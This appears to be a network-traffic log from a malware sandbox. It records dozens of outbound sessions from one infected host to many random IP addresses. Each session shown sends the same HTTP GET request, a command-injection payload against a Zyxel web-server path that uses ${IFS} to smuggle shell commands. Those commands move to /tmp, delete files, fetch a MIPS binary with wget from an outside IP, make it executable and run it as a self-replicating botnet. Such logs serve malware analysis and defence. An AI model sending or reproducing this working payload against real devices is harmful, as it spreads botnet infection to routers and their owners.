                                                      Feb 2, 2024 06:35:57.728435993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5530192.168.2.1460634100.139.131.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728442907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5531192.168.2.1450030187.177.57.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728490114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5532192.168.2.14378909.117.63.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728537083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5533192.168.2.144031454.232.190.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728595018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5534192.168.2.1452520136.177.79.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728629112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5535192.168.2.145470423.161.168.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728699923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5536192.168.2.1443120182.69.77.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728733063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5537192.168.2.1436548176.242.212.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728756905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5538192.168.2.146028690.116.24.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728794098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5539192.168.2.1454286130.206.73.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728825092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5540192.168.2.145805648.143.92.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728883982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5541192.168.2.144395679.93.26.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728930950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5542192.168.2.1436498208.75.82.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728962898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5543192.168.2.1437056123.106.13.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.728990078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5544192.168.2.145040435.92.241.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729020119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5545192.168.2.1443620195.235.178.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729079008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5546192.168.2.1446802170.158.4.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729104996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5547192.168.2.1456378139.217.210.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729129076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5548192.168.2.1444688204.85.16.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729185104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5549192.168.2.1450468133.6.210.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729226112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5550192.168.2.1451846173.255.148.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729259968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5551192.168.2.144729283.144.56.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729289055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5552192.168.2.145228083.158.161.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729351044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5553192.168.2.1446226112.254.95.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729372025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5554192.168.2.1439278182.197.6.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729435921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5555192.168.2.144864465.11.70.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729465008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5556192.168.2.1449590152.77.182.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729511976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5557192.168.2.1434630120.11.188.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729543924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5558192.168.2.1436198170.107.218.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729598045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5559192.168.2.145514434.20.11.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729636908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5560192.168.2.145428451.76.14.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729681015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5561192.168.2.1452918184.50.36.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729727983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5562192.168.2.1435422113.247.120.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729789972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5563192.168.2.145350036.73.154.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729824066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5564192.168.2.14579524.142.194.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729865074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5565192.168.2.1442618139.86.148.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729907990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5566192.168.2.143896817.36.160.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729943991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5567192.168.2.143914414.79.134.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.729984999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5568192.168.2.145956467.10.239.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730010986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5569192.168.2.1450490217.96.53.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730043888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5570192.168.2.143855049.4.166.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730087996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5571192.168.2.1454026207.217.51.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730134010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5572192.168.2.145686627.217.195.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730146885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5573192.168.2.1446836156.177.42.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730206966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5574192.168.2.144607024.238.138.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730243921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5575192.168.2.1441572139.242.152.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730293989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5576192.168.2.1443942119.150.87.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730324030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5577192.168.2.143303047.231.215.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730355978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5578192.168.2.144336053.30.126.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730415106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5579192.168.2.1443108131.119.5.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730467081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5580192.168.2.1454492176.237.32.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730504036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5581192.168.2.144070493.188.223.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730540037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5582192.168.2.1450304188.54.55.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730566025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5583192.168.2.1439036218.160.115.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730621099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5584192.168.2.1452462189.134.226.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730688095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5585192.168.2.1448480115.180.220.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730705023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5586192.168.2.1460520194.107.121.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730751991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5587192.168.2.1433902157.159.190.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730792999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5588192.168.2.144218285.225.143.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730839014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5589192.168.2.1456454132.227.212.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730873108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5590192.168.2.1445020124.80.195.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730921984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5591192.168.2.146088851.74.35.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.730963945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5592192.168.2.1436978192.5.224.173443
                                                      TimestampBytes transferredDirectionData
